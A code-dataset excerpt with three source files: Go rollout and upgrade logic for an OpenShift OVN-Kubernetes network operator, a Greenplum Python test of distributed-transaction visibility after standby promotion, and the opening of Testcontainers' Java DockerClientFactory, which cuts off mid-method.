currentAnnotation[names.OVNRaftClusterInitiator] = clusterInitiator
}
conf.SetAnnotations(currentAnnotation)
}
// Retrieve existing daemonsets or statefulsets status - used for deciding if upgrades should happen
var nsn types.NamespacedName
masterStatus := &bootstrap.OVNUpdateStatus{}
nodeStatus := &bootstrap.OVNUpdateStatus{}
ipsecStatus := &bootstrap.OVNUpdateStatus{}
prepullerStatus := &bootstrap.OVNUpdateStatus{}
if hc.Enabled {
masterSS := &appsv1.StatefulSet{
TypeMeta: metav1.TypeMeta{
Kind: "StatefulSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: hc.Namespace, Name: "ovnkube-master"}
if err := kubeClient.ClientFor(cnoclient.ManagementClusterName).CRClient().Get(context.TODO(), nsn, masterSS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing master DaemonSet: %w", err)
} else {
masterStatus = nil
}
} else {
masterStatus.Kind = "StatefulSet"
masterStatus.Namespace = masterSS.Namespace
masterStatus.Name = masterSS.Name
masterStatus.IPFamilyMode = masterSS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
masterStatus.Version = masterSS.GetAnnotations()["release.openshift.io/version"]
masterStatus.Progressing = statefulSetProgressing(masterSS)
}
} else {
masterDS := &appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
Kind: "DaemonSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: "openshift-ovn-kubernetes", Name: "ovnkube-master"}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), nsn, masterDS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing master DaemonSet: %w", err)
} else {
masterStatus = nil
}
} else {
masterStatus.Kind = "DaemonSet"
masterStatus.Namespace = masterDS.Namespace
masterStatus.Name = masterDS.Name
masterStatus.IPFamilyMode = masterDS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
masterStatus.Version = masterDS.GetAnnotations()["release.openshift.io/version"]
masterStatus.Progressing = daemonSetProgressing(masterDS, false)
}
}
nodeDS := &appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
Kind: "DaemonSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: "openshift-ovn-kubernetes", Name: "ovnkube-node"}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), nsn, nodeDS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing node DaemonSet: %w", err)
} else {
nodeStatus = nil
}
} else {
nodeStatus.Kind = "DaemonSet"
nodeStatus.Namespace = nodeDS.Namespace
nodeStatus.Name = nodeDS.Name
nodeStatus.IPFamilyMode = nodeDS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
nodeStatus.Version = nodeDS.GetAnnotations()["release.openshift.io/version"]
nodeStatus.Progressing = daemonSetProgressing(nodeDS, true)
}
prePullerDS := &appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
Kind: "DaemonSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: "openshift-ovn-kubernetes", Name: "ovnkube-upgrades-prepuller"}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), nsn, prePullerDS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing prepuller DaemonSet: %w", err)
} else {
prepullerStatus = nil
}
} else {
prepullerStatus.Namespace = prePullerDS.Namespace
prepullerStatus.Name = prePullerDS.Name
prepullerStatus.IPFamilyMode = prePullerDS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
prepullerStatus.Version = prePullerDS.GetAnnotations()["release.openshift.io/version"]
prepullerStatus.Progressing = daemonSetProgressing(prePullerDS, true)
}
ipsecDS := &appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
Kind: "DaemonSet",
APIVersion: appsv1.SchemeGroupVersion.String(),
},
}
nsn = types.NamespacedName{Namespace: "openshift-ovn-kubernetes", Name: "ovn-ipsec"}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), nsn, ipsecDS); err != nil {
if !apierrors.IsNotFound(err) {
return nil, fmt.Errorf("Failed to retrieve existing ipsec DaemonSet: %w", err)
} else {
ipsecStatus = nil
}
} else {
ipsecStatus.Namespace = ipsecDS.Namespace
ipsecStatus.Name = ipsecDS.Name
ipsecStatus.IPFamilyMode = ipsecDS.GetAnnotations()[names.NetworkIPFamilyModeAnnotation]
ipsecStatus.Version = ipsecDS.GetAnnotations()["release.openshift.io/version"]
}
res := bootstrap.OVNBootstrapResult{
MasterAddresses: ovnMasterAddresses,
ClusterInitiator: clusterInitiator,
MasterUpdateStatus: masterStatus,
NodeUpdateStatus: nodeStatus,
IPsecUpdateStatus: ipsecStatus,
PrePullerUpdateStatus: prepullerStatus,
OVNKubernetesConfig: ovnConfigResult,
FlowsConfig: bootstrapFlowsConfig(kubeClient.ClientFor("").CRClient()),
}
return &res, nil
}
// bootstrapFlowsConfig looks for the openshift-network-operator/ovs-flows-config configmap and
// returns its parsed contents, or nil if it does not exist (or can't be properly parsed).
func bootstrapFlowsConfig(cl crclient.Reader) *bootstrap.FlowsConfig {
cm := corev1.ConfigMap{}
if err := cl.Get(context.TODO(), types.NamespacedName{
Name: OVSFlowsConfigMapName,
Namespace: OVSFlowsConfigNamespace,
}, &cm); err != nil {
if !apierrors.IsNotFound(err) {
klog.Warningf("%s: error fetching configmap: %v", OVSFlowsConfigMapName, err)
}
// ovs-flows-config is not defined. Ignoring from bootstrap
return nil
}
fc := bootstrap.FlowsConfig{}
// fetching string fields and transforming them to OVS format
if st, ok := cm.Data["sharedTarget"]; ok {
fc.Target = st
} else if np, ok := cm.Data["nodePort"]; ok {
// empty host will be interpreted as Node IP by ovn-kubernetes
fc.Target = ":" + np
} else {
klog.Warningf("%s: wrong data section: either sharedTarget or nodePort sections are needed: %+v",
OVSFlowsConfigMapName, cm.Data)
return nil
}
if catStr, ok := cm.Data["cacheActiveTimeout"]; ok {
if catd, err := time.ParseDuration(catStr); err != nil {
klog.Warningf("%s: wrong cacheActiveTimeout value %s. Ignoring: %v",
OVSFlowsConfigMapName, catStr, err)
} else {
catf := catd.Seconds()
catu := uint(catf)
if catf != float64(catu) {
klog.Warningf("%s: cacheActiveTimeout %s will be truncated to %d seconds",
OVSFlowsConfigMapName, catStr, catu)
}
fc.CacheActiveTimeout = &catu
}
}
if cmfStr, ok := cm.Data["cacheMaxFlows"]; ok {
if cmf, err := strconv.ParseUint(cmfStr, 10, 32); err != nil {
klog.Warningf("%s: wrong cacheMaxFlows value %s. Ignoring: %v",
OVSFlowsConfigMapName, cmfStr, err)
} else {
cmfu := uint(cmf)
fc.CacheMaxFlows = &cmfu
}
}
if sStr, ok := cm.Data["sampling"]; ok {
if sampling, err := strconv.ParseUint(sStr, 10, 32); err != nil {
klog.Warningf("%s: wrong sampling value %s. Ignoring: %v",
OVSFlowsConfigMapName, sStr, err)
} else {
su := uint(sampling)
fc.Sampling = &su
}
}
return &fc
}
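// Illustrative ovs-flows-config data (hypothetical values): sharedTarget: "10.0.0.5:2056",
// cacheActiveTimeout: "20s", cacheMaxFlows: "400", sampling: "50" would parse to
// Target="10.0.0.5:2056", CacheActiveTimeout=20, CacheMaxFlows=400, Sampling=50.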
func currentInitiatorExists(ovnMasterAddresses []string, configInitiator string) bool {
for _, masterIP := range ovnMasterAddresses {
if masterIP == configInitiator {
return true
}
}
return false
}
func dbList(masterIPs []string, port string) string {
addrs := make([]string, len(masterIPs))
for i, ip := range masterIPs {
addrs[i] = "ssl:" + net.JoinHostPort(ip, port)
}
return strings.Join(addrs, ",")
}
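// Illustrative (hypothetical addresses): dbList([]string{"10.0.0.1", "fd00::1"}, "9641")
// returns "ssl:10.0.0.1:9641,ssl:[fd00::1]:9641"; net.JoinHostPort brackets IPv6 hosts.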
func listenDualStack(masterIP string) string {
if strings.Contains(masterIP, ":") {
// IPv6 master, make the databases listen dual-stack
return ":[::]"
} else {
// IPv4 master, be IPv4-only for backward-compatibility
return ""
}
}
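// Illustrative: listenDualStack("fd00::1") returns ":[::]" (listen dual-stack), while
// listenDualStack("10.0.0.1") returns "" (IPv4-only for backward compatibility).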
// shouldUpdateOVNKonIPFamilyChange determines if we should roll out changes to
// the master and node daemonsets on IP family configuration changes.
// We roll out changes on masters first when there is a configuration change.
// Configuration changes take precedence over upgrades.
func shouldUpdateOVNKonIPFamilyChange(ovn bootstrap.OVNBootstrapResult, ipFamilyMode string) (updateNode, updateMaster bool) {
// Fresh cluster - full steam ahead!
if ovn.NodeUpdateStatus == nil || ovn.MasterUpdateStatus == nil {
return true, true
}
// check current IP family mode
nodeIPFamilyMode := ovn.NodeUpdateStatus.IPFamilyMode
masterIPFamilyMode := ovn.MasterUpdateStatus.IPFamilyMode
// if there are no annotations this is a fresh cluster
if nodeIPFamilyMode == "" || masterIPFamilyMode == "" {
return true, true
}
// exit if there are no IP family mode changes
if nodeIPFamilyMode == ipFamilyMode && masterIPFamilyMode == ipFamilyMode {
return true, true
}
// If the master config has changed, update only the master; the node will be updated later
if masterIPFamilyMode != ipFamilyMode {
klog.V(2).Infof("IP family mode change detected to %s, updating OVN-Kubernetes master", ipFamilyMode)
return false, true
}
// Don't rollout the changes on nodes until the master daemonset rollout has finished
if ovn.MasterUpdateStatus.Progressing {
klog.V(2).Infof("Waiting for OVN-Kubernetes master daemonset IP family mode rollout before updating node")
return false, true
}
klog.V(2).Infof("OVN-Kubernetes master daemonset rollout complete, updating IP family mode on node daemonset")
return true, true
}
// shouldUpdateOVNKonPrepull implements a simple pre-pulling daemonset. It ensures the ovn-k
// container image is (probably) already pulled by every node.
// If the existing node daemonset has a different version than what we would like to apply, we first
// roll out a no-op daemonset. Then, when that has rolled out to 100% of the cluster or has stopped
// progressing, proceed with the node upgrade.
func shouldUpdateOVNKonPrepull(ovn bootstrap.OVNBootstrapResult, releaseVersion string) (updateNode, renderPrepull bool) {
// Fresh cluster - full steam ahead! No need to wait for pre-puller.
if ovn.NodeUpdateStatus == nil {
klog.V(3).Infof("Fresh cluster, no need for prepuller")
return true, false
}
// if node is already upgraded, then no need to pre-pull
// Return true so that we reconcile any changes that somehow could have happened.
existingNodeVersion := ovn.NodeUpdateStatus.Version
if existingNodeVersion == releaseVersion {
klog.V(3).Infof("OVN-Kubernetes node is already in the expected release.")
return true, false
}
// at this point, we've determined we need an upgrade
if ovn.PrePullerUpdateStatus == nil {
klog.Infof("Rolling out the no-op prepuller daemonset...")
return false, true
}
// If the pre-puller just pulled a new upgrade image and we then downgrade
// immediately, we may want the prepuller to pull the downgrade image instead.
existingPrePullerVersion := ovn.PrePullerUpdateStatus.Version
if existingPrePullerVersion != releaseVersion {
klog.Infof("Rendering prepuller daemonset to update its image...")
return false, true
}
if ovn.PrePullerUpdateStatus.Progressing {
klog.Infof("Waiting for ovnkube-upgrades-prepuller daemonset to finish pulling the image before updating node")
return false, true
}
klog.Infof("OVN-Kube upgrades-prepuller daemonset rollout complete, now starting node rollouts")
return true, false
}
// shouldUpdateOVNKonUpgrade determines if we should roll out changes to
// the master and node daemonsets on upgrades. We roll out nodes first,
// then masters. On downgrades, we do the opposite.
func shouldUpdateOVNKonUpgrade(ovn bootstrap.OVNBootstrapResult, releaseVersion string) (updateNode, updateMaster bool) {
// Fresh cluster - full steam ahead!
if ovn.NodeUpdateStatus == nil || ovn.MasterUpdateStatus == nil {
return true, true
}
nodeVersion := ovn.NodeUpdateStatus.Version
masterVersion := ovn.MasterUpdateStatus.Version
// shortcut - we're all rolled out.
// Return true so that we reconcile any changes that somehow could have happened.
if nodeVersion == releaseVersion && masterVersion == releaseVersion {
klog.V(2).Infof("OVN-Kubernetes master and node already at release version %s; no changes required", releaseVersion)
return true, true
}
// compute version delta
// versionUpgrade means the existing daemonSet needs an upgrade.
masterDelta := compareVersions(masterVersion, releaseVersion)
nodeDelta := compareVersions(nodeVersion, releaseVersion)
if masterDelta == versionUnknown || nodeDelta == versionUnknown {
klog.Warningf("could not determine ovn-kubernetes daemonset update directions; node: %s, master: %s, release: %s",
nodeVersion, masterVersion, releaseVersion)
return true, true
}
klog.V(2).Infof("OVN-Kubernetes master version %s -> latest %s; delta %s", masterVersion, releaseVersion, masterDelta)
klog.V(2).Infof("OVN-Kubernetes node version %s -> latest %s; delta %s", nodeVersion, releaseVersion, nodeDelta)
// 9 cases
// +-------------+---------------+-----------------+------------------+
// | Delta | master upg. | master OK | master downg. |
// +-------------+---------------+-----------------+------------------+
// | node upg. | upgrade node | error | error |
// | node OK | wait for node | done | error |
// | node downg. | error | wait for master | downgrade master |
// +-------------+---------------+-----------------+------------------+
// both older (than CNO)
// Update node only.
if masterDelta == versionUpgrade && nodeDelta == versionUpgrade {
klog.V(2).Infof("Upgrading OVN-Kubernetes node before master")
return true, false
}
// master older, node updated
// update master if node is rolled out
if masterDelta == versionUpgrade && nodeDelta == versionSame {
if ovn.NodeUpdateStatus.Progressing {
klog.V(2).Infof("Waiting for OVN-Kubernetes node update to roll out before updating master")
return true, false
}
klog.V(2).Infof("OVN-Kubernetes node update rolled out; now updating master")
return true, true
}
// both newer
// downgrade master before node
if masterDelta == versionDowngrade && nodeDelta == versionDowngrade {
klog.V(2).Infof("Downgrading OVN-Kubernetes master before node")
return false, true
}
// master same, node needs downgrade
// wait for master rollout
if masterDelta == versionSame && nodeDelta == versionDowngrade {
if ovn.MasterUpdateStatus.Progressing {
klog.V(2).Infof("Waiting for OVN-Kubernetes master downgrade to roll out before downgrading node")
return false, true
}
klog.V(2).Infof("OVN-Kubernetes master update rolled out; now downgrading node")
return true, true
}
// unlikely, should be caught above
if masterDelta == versionSame && nodeDelta == versionSame {
return true, true
}
klog.Warningf("OVN-Kubernetes daemonset versions inconsistent. node: %s, master: %s, release: %s",
nodeVersion, masterVersion, releaseVersion)
return true, true
}
// daemonSetProgressing returns true if a daemonset is rolling out a change.
// If allowHung is true, then treat a daemonset hung at 90% as "done" for our purposes.
func daemonSetProgressing(ds *appsv1.DaemonSet, allowHung bool) bool {
status := ds.Status
// Copy-pasted from status_manager: Determine if a DaemonSet is progressing
progressing := (status.UpdatedNumberScheduled < status.DesiredNumberScheduled ||
status.NumberUnavailable > 0 ||
status.NumberAvailable == 0 ||
ds.Generation > status.ObservedGeneration)
s := "progressing"
if !progressing {
s = "complete"
}
klog.V(2).Infof("daemonset %s/%s rollout %s; %d/%d scheduled; %d unavailable; %d available; generation %d -> %d",
ds.Namespace, ds.Name, s, status.UpdatedNumberScheduled, status.DesiredNumberScheduled,
status.NumberUnavailable, status.NumberAvailable, ds.Generation, status.ObservedGeneration)
if !progressing {
klog.V(2).Infof("daemonset %s/%s rollout complete", ds.Namespace, ds.Name)
return false
}
// If we're hung, but all nodes except at most max(10% of nodes, 1) have been updated, then act as if not progressing
if allowHung {
_, hung := ds.GetAnnotations()[names.RolloutHungAnnotation]
maxBehind := int(math.Max(1, math.Floor(float64(status.DesiredNumberScheduled)*0.1)))
numBehind := int(status.DesiredNumberScheduled - status.UpdatedNumberScheduled)
if hung && numBehind <= maxBehind {
klog.Warningf("daemonset %s/%s rollout seems to have hung with %d/%d behind, force-continuing", ds.Namespace, ds.Name, numBehind, status.DesiredNumberScheduled)
return false
}
}
return true
}
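// Illustrative: with DesiredNumberScheduled=30 and UpdatedNumberScheduled=28,
// maxBehind=max(1, floor(30*0.1))=3 and numBehind=2, so a rollout annotated as hung
// is treated as complete.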
// statefulSetProgressing returns true if a statefulset is rolling out a change.
func statefulSetProgressing(ss *appsv1.StatefulSet) bool {
status := ss.Status
// Copy-pasted from status_manager: Determine if a StatefulSet is progressing
progressing := (status.ReadyReplicas < status.Replicas ||
status.AvailableReplicas == 0 ||
ss.Generation > status.ObservedGeneration)
s := "progressing"
if !progressing {
s = "complete"
}
klog.V(2).Infof("statefulset %s/%s rollout %s; %d/%d scheduled; %d available; generation %d -> %d",
ss.Namespace, ss.Name, s, status.ReadyReplicas, status.Replicas,
status.AvailableReplicas, ss.Generation, status.ObservedGeneration)
if !progressing {
klog.V(2).Infof("statefulset %s/%s rollout complete", ss.Namespace, ss.Name)
return false
}
return true
}
// setOVNObjectAnnotation annotates the OVNkube master and node daemonsets/statefulsets.
// It also annotates the pod template with the provided key and value to force a rollout.
func setOVNObjectAnnotation(objs []*uns.Unstructured, key, value string) error {
for _, obj := range objs {
if obj.GetAPIVersion() == "apps/v1" &&
(obj.GetKind() == "DaemonSet" || obj.GetKind() == "StatefulSet") &&
(obj.GetName() == "ovnkube-master" || obj.GetName() == "ovnkube-node") {
// set daemonset annotation
anno := obj.GetAnnotations()
if anno == nil {
anno = map[string]string{}
}
anno[key] = value
obj.SetAnnotations(anno)
// set pod template annotation
anno, _, _ = uns.NestedStringMap(obj.Object, "spec", "template", "metadata", "annotations")
if anno == nil {
anno = map[string]string{}
}
anno[key] = value
if err := uns.SetNestedStringMap(obj.Object, anno, "spec", "template", "metadata", "annotations"); err != nil {
return err
}
}
}
return nil
}
| [
"\"RELEASE_VERSION\"",
"\"OVN_IMAGE\"",
"\"KUBE_RBAC_PROXY_IMAGE\"",
"\"TOKEN_MINTER_IMAGE\"",
"\"TOKEN_AUDIENCE\"",
"\"OVN_NB_RAFT_ELECTION_TIMER\"",
"\"OVN_SB_RAFT_ELECTION_TIMER\"",
"\"OVN_CONTROLLER_INACTIVITY_PROBE\"",
"\"OVN_CONTROLLER_INACTIVITY_PROBE\"",
"\"OVN_NB_INACTIVITY_PROBE\"",
"\"OVN_NORTHD_PROBE_INTERVAL\"",
"\"RELEASE_VERSION\"",
"\"RELEASE_VERSION\"",
"\"HOSTED_CLUSTER_NAMESPACE\""
] | [] | [
"TOKEN_AUDIENCE",
"OVN_SB_RAFT_ELECTION_TIMER",
"KUBE_RBAC_PROXY_IMAGE",
"OVN_CONTROLLER_INACTIVITY_PROBE",
"OVN_IMAGE",
"TOKEN_MINTER_IMAGE",
"OVN_NB_RAFT_ELECTION_TIMER",
"HOSTED_CLUSTER_NAMESPACE",
"OVN_NB_INACTIVITY_PROBE",
"RELEASE_VERSION",
"OVN_NORTHD_PROBE_INTERVAL"
] | [] | ["TOKEN_AUDIENCE", "OVN_SB_RAFT_ELECTION_TIMER", "KUBE_RBAC_PROXY_IMAGE", "OVN_CONTROLLER_INACTIVITY_PROBE", "OVN_IMAGE", "TOKEN_MINTER_IMAGE", "OVN_NB_RAFT_ELECTION_TIMER", "HOSTED_CLUSTER_NAMESPACE", "OVN_NB_INACTIVITY_PROBE", "RELEASE_VERSION", "OVN_NORTHD_PROBE_INTERVAL"] | go | 11 | 0 | |
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/walrepl/xact/test_basic.py | #!/usr/bin/env python
"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from gppylib.commands.base import Command
from tinctest import logger
from mpp.lib.PSQL import PSQL
from mpp.models import MPPTestCase
from mpp.gpdb.tests.storage.walrepl import lib as walrepl
import mpp.gpdb.tests.storage.walrepl.run
from mpp.gpdb.tests.storage.walrepl.lib.fault import *
import os
import re
import subprocess
import socket
import time
import shutil
import sys
import signal
class xansrep(mpp.gpdb.tests.storage.walrepl.run.StandbyRunMixin, MPPTestCase):
def tearDown(self):
self.standby.remove_catalog_standby("")
super(xansrep, self).tearDown()
#self.reset_fault('all')
Gpfault().reset_fault('transaction_abort_after_distributed_prepared')
Gpfault().reset_fault('dtm_broadcast_commit_prepared')
def run_sql(self, sql, port=os.environ.get('PGPORT', '5432')):
return subprocess.Popen(['psql',
'-c', sql,
'-p', port],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
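# Note (usage sketch): run_sql does not wait for the statement to finish; callers
# later use proc.communicate() to collect (stdout, stderr) once the backend unblocks.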
def test_xansrep(self):
"""
Test for distributed transactions. Here are two cases:
A. a transaction in prepared state
B. a transaction after broadcast commit prepared
In case A, the transaction will be aborted, and B should be visible.
The flow of this test is as follows.
1. Initiate the Standby using the Master (primary) postmaster
parameters.
2. B: Inject the fault to suspend the Master after the commit is done.
3. B: Now execute a transaction and commit it. This transaction will be blocked.
4. A: Inject the fault to suspend the Master after the prepare is done.
5. A: Now execute a transaction and commit it. This transaction will be blocked.
6. Promote the standby.
7. Verify the result, transaction A results should not be visible and
transaction B results should be visible.
"""
PSQL.run_sql_command('DROP table if exists xansrep_prepare')
PSQL.run_sql_command('DROP table if exists xansrep_commit')
PSQL.run_sql_command('DROP table if exists xansrep_dummy')
PSQL.run_sql_command('create table xansrep_dummy (a int)')
PSQL.run_sql_command('insert into xansrep_dummy '
'select * from generate_series(1, 1000)')
Command('remove standby', 'gpinitstandby -ra').run()
fault = Gpfault()
# 1. Initial setup
res = self.standby.create()
self.assertEqual(res, 0)
res = self.standby.start()
self.assertTrue(res.wasSuccessful())
# wait for the walreceiver to start
num_walsender = self.wait_for_walsender()
self.assertEqual(num_walsender, 1)
# 2. Inject fault at commit prepared state
result = fault.suspend_at('dtm_broadcast_commit_prepared')
logger.info(result.stdout)
self.assertEqual(result.rc, 0, result.stdout)
# 3. Now execute a transaction and commit it. The backend is expected
# to be blocked.
logger.info('Create table xansrep_commit...')
# Due to the suspend, we don't wait for the result
proc = self.run_sql('create table xansrep_commit as '
'select * from xansrep_dummy')
logger.info('Check if suspend fault is hit after commit...')
triggered = fault.wait_triggered('dtm_broadcast_commit_prepared')
self.assertTrue(triggered, 'Fault was not triggered')
# 4. Inject fault at prepared state
result = fault.suspend_at(
'transaction_abort_after_distributed_prepared')
logger.info(result.stdout)
self.assertEqual(result.rc, 0, result.stdout)
# 5. Now execute a transaction and commit it. The backend is expected
# to be blocked.
logger.info('Create table xansrep_prepare...')
# Due to the suspend, we don't wait for the result
proc = self.run_sql('create table xansrep_prepare (a int)')
logger.info('Check if suspend fault is hit ...')
triggered = fault.wait_triggered(
'transaction_abort_after_distributed_prepared')
self.assertTrue(triggered, 'Fault was not triggered')
# 6. Promote standby
# We don't kill/stop the primary, as it's convenient for
# next testing, and the outcome wouldn't change.
self.standby.promote()
# 7. Verify the result replicated to the standby.
logger.info('Verify if table xansrep_prepare exists...')
proc = self.run_sql('select * from xansrep_prepare',
str(self.standby.port))
# the table should not exist
stderr = proc.communicate()[1]
logger.info(stderr)
search = "ERROR: relation \"xansrep_prepare\" does not exist"
self.assertTrue(stderr.find(search) >= 0)
logger.info('Verify if table xansrep_commit exists...')
proc = self.run_sql('select count(*) from xansrep_commit',
str(self.standby.port))
# the table should exist
stdout = proc.communicate()[0]
logger.info(stdout)
search = "1000"
self.assertTrue(stdout.find(search) >= 0)
logger.info('Pass')
| [] | [] | [
"PGPORT"
] | [] | ["PGPORT"] | python | 1 | 0 | |
core/src/main/java/org/testcontainers/DockerClientFactory.java | package org.testcontainers;
import com.github.dockerjava.api.DockerClient;
import com.github.dockerjava.api.command.CreateContainerCmd;
import com.github.dockerjava.api.exception.InternalServerErrorException;
import com.github.dockerjava.api.exception.NotFoundException;
import com.github.dockerjava.api.model.AccessMode;
import com.github.dockerjava.api.model.Bind;
import com.github.dockerjava.api.model.Image;
import com.github.dockerjava.api.model.Info;
import com.github.dockerjava.api.model.Version;
import com.github.dockerjava.api.model.Volume;
import com.github.dockerjava.core.command.ExecStartResultCallback;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.collect.ImmutableMap;
import lombok.Getter;
import lombok.SneakyThrows;
import lombok.Synchronized;
import lombok.extern.slf4j.Slf4j;
import org.testcontainers.dockerclient.DockerClientProviderStrategy;
import org.testcontainers.dockerclient.DockerMachineClientProviderStrategy;
import org.testcontainers.images.TimeLimitedLoggedPullImageResultCallback;
import org.testcontainers.utility.ComparableVersion;
import org.testcontainers.utility.MountableFile;
import org.testcontainers.utility.ResourceReaper;
import org.testcontainers.utility.TestcontainersConfiguration;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.ServiceLoader;
import java.util.UUID;
import java.util.function.BiFunction;
import java.util.function.Consumer;
/**
* Singleton class that provides initialized Docker clients.
* <p>
* The correct client configuration to use will be determined on first use, and cached thereafter.
*/
@Slf4j
public class DockerClientFactory {
public static final ThreadGroup TESTCONTAINERS_THREAD_GROUP = new ThreadGroup("testcontainers");
public static final String TESTCONTAINERS_LABEL = DockerClientFactory.class.getPackage().getName();
public static final String TESTCONTAINERS_SESSION_ID_LABEL = TESTCONTAINERS_LABEL + ".sessionId";
public static final String SESSION_ID = UUID.randomUUID().toString();
public static final Map<String, String> DEFAULT_LABELS = ImmutableMap.of(
TESTCONTAINERS_LABEL, "true",
TESTCONTAINERS_SESSION_ID_LABEL, SESSION_ID
);
private static final String TINY_IMAGE = TestcontainersConfiguration.getInstance().getTinyImage();
private static DockerClientFactory instance;
// Cached client configuration
@VisibleForTesting
DockerClientProviderStrategy strategy;
@VisibleForTesting
DockerClient dockerClient;
@VisibleForTesting
RuntimeException cachedChecksFailure;
private String activeApiVersion;
private String activeExecutionDriver;
@Getter(lazy = true)
private final boolean fileMountingSupported = checkMountableFile();
static {
System.setProperty("org.testcontainers.shaded.io.netty.packagePrefix", "org.testcontainers.shaded.");
}
@VisibleForTesting
DockerClientFactory() {
}
public static DockerClient lazyClient() {
return LazyDockerClient.INSTANCE;
}
/**
* Obtain an instance of the DockerClientFactory.
*
* @return the singleton instance of DockerClientFactory
*/
public synchronized static DockerClientFactory instance() {
if (instance == null) {
instance = new DockerClientFactory();
}
return instance;
}
@Synchronized
private DockerClientProviderStrategy getOrInitializeStrategy() {
if (strategy != null) {
return strategy;
}
List<DockerClientProviderStrategy> configurationStrategies = new ArrayList<>();
ServiceLoader.load(DockerClientProviderStrategy.class).forEach(configurationStrategies::add);
strategy = DockerClientProviderStrategy.getFirstValidStrategy(configurationStrategies);
return strategy;
}
/**
*
* @return a new initialized Docker client
*/
@Synchronized
public DockerClient client() {
if (dockerClient != null) {
return dockerClient;
}
// fail-fast if checks have failed previously
if (cachedChecksFailure != null) {
log.debug("There is a cached checks failure - throwing", cachedChecksFailure);
throw cachedChecksFailure;
}
final DockerClientProviderStrategy strategy = getOrInitializeStrategy();
String hostIpAddress = strategy.getDockerHostIpAddress();
log.info("Docker host IP address is {}", hostIpAddress);
final DockerClient client = strategy.getClient();
Info dockerInfo = client.infoCmd().exec();
Version version = client.versionCmd().exec();
activeApiVersion = version.getApiVersion();
activeExecutionDriver = dockerInfo.getExecutionDriver();
log.info("Connected to docker: \n" +
" Server Version: " + dockerInfo.getServerVersion() + "\n" +
" API Version: " + activeApiVersion + "\n" +
" Operating System: " + dockerInfo.getOperatingSystem() + "\n" +
" Total Memory: " + dockerInfo.getMemTotal() / (1024 * 1024) + " MB");
final String ryukContainerId;
boolean useRyuk = !Boolean.parseBoolean(System.getenv("TESTCONTAINERS_RYUK_DISABLED"));
if (useRyuk) {
log.debug("Ryuk is enabled");
ryukContainerId = ResourceReaper.start(hostIpAddress, client);
log.info("Ryuk started - will monitor and terminate Testcontainers containers on JVM exit");
} else {
log.debug("Ryuk is disabled");
ryukContainerId = null;
}
boolean checksEnabled = !TestcontainersConfiguration.getInstance().isDisableChecks();
if (checksEnabled) {
log.debug("Checks are enabled");
try {
log.info("Checking the system...");
checkDockerVersion(version.getVersion());
if (ryukContainerId != null) {
checkDiskSpace(client, ryukContainerId);
} else {
runInsideDocker(
client,
createContainerCmd -> {
createContainerCmd.withName("testcontainers-checks-" + SESSION_ID);
createContainerCmd.getHostConfig().withAutoRemove(true);
createContainerCmd.withCmd("tail", "-f", "/dev/null");
},
(__, containerId) -> {
checkDiskSpace(client, containerId);
return "";
}
);
}
} catch (RuntimeException e) {
cachedChecksFailure = e;
throw e;
}
} else {
log.debug("Checks are disabled");
}
dockerClient = client;
return dockerClient;
}
private void checkDockerVersion(String dockerVersion) {
boolean versionIsSufficient = new ComparableVersion(dockerVersion).compareTo(new ComparableVersion("1.6.0")) >= 0;
check("Docker server version should be at least 1.6.0", versionIsSufficient);
}
private void checkDiskSpace(DockerClient dockerClient, String id) {
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
try {
dockerClient
.execStartCmd(dockerClient.execCreateCmd(id).withAttachStdout(true).withCmd("df", "-P").exec().getId())
.exec(new ExecStartResultCallback(outputStream, null))
.awaitCompletion();
} catch (Exception e) {
log.debug("Can't exec disk checking command", e);
}
DiskSpaceUsage df = parseAvailableDiskSpace(outputStream.toString());
check(
"Docker environment should have more than 2GB free disk space",
df.availableMB.map(it -> it >= 2048).orElse(true)
);
}
private void check(String message, boolean isSuccessful) {
if (isSuccessful) {
log.info("\u2714︎ {}", message);
} else {
log.error("\u274c {}", message);
throw new IllegalStateException("Check failed: " + message);
}
}
private boolean checkMountableFile() {
DockerClient dockerClient = client();
MountableFile mountableFile = MountableFile.forClasspathResource(ResourceReaper.class.getName().replace(".", "/") + ".class");
Volume volume = new Volume("/dummy");
try {
return runInsideDocker(
createContainerCmd -> createContainerCmd.withBinds(new Bind(mountableFile.getMountablePath(), volume, AccessMode.ro)),
(__, containerId) -> {
try (InputStream stream = dockerClient.copyArchiveFromContainerCmd(containerId, volume.getPath()).exec()) {
stream.read();
return true;
} catch (Exception e) {
return false;
}
}
);
} catch (Exception e) {
